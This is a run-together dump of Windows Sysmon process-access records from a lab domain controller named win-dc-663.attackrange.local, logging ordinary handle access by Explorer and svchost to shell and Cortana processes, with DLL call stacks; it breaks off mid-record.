21:06:46.932{4DB9351A-9F2C-60D3-D000-00000000CF01}50642724C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022247Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.932{4DB9351A-9F2C-60D3-D000-00000000CF01}50642724C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022246Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.932{4DB9351A-9F2C-60D3-D000-00000000CF01}50642724C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0D00-00000000CF01}904860C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0D00-00000000CF01}904860C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0D00-00000000CF01}904860C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0D00-00000000CF01}904860C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022241Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0D00-00000000CF01}904860C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022240Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0D00-00000000CF01}904860C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022239Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022238Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022237Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022236Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000022235Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000022234Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000022233Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022232Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022231Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9F2C-60D3-D000-00000000CF01}50646804C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022230Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9F2C-60D3-D000-00000000CF01}50646804C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022229Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9F2C-60D3-D000-00000000CF01}50645752C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022228Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57ad5|C:\Windows\System32\TwinUI.dll+37578|C:\Windows\System32\TwinUI.dll+37498|C:\Windows\System32\TwinUI.dll+388e3|C:\Windows\System32\TwinUI.dll+36ebd|C:\Windows\System32\TwinUI.dll+36cc1|C:\Windows\System32\TwinUI.dll+3fb3d0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x800000000000000022227Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57ad5|C:\Windows\System32\TwinUI.dll+375e0|C:\Windows\System32\TwinUI.dll+37485|C:\Windows\System32\TwinUI.dll+388e3|C:\Windows\System32\TwinUI.dll+36ebd|C:\Windows\System32\TwinUI.dll+36cc1|C:\Windows\System32\TwinUI.dll+3fb3d0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x800000000000000022226Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.853{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A266-60D3-FC04-00000000CF01}6880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\nt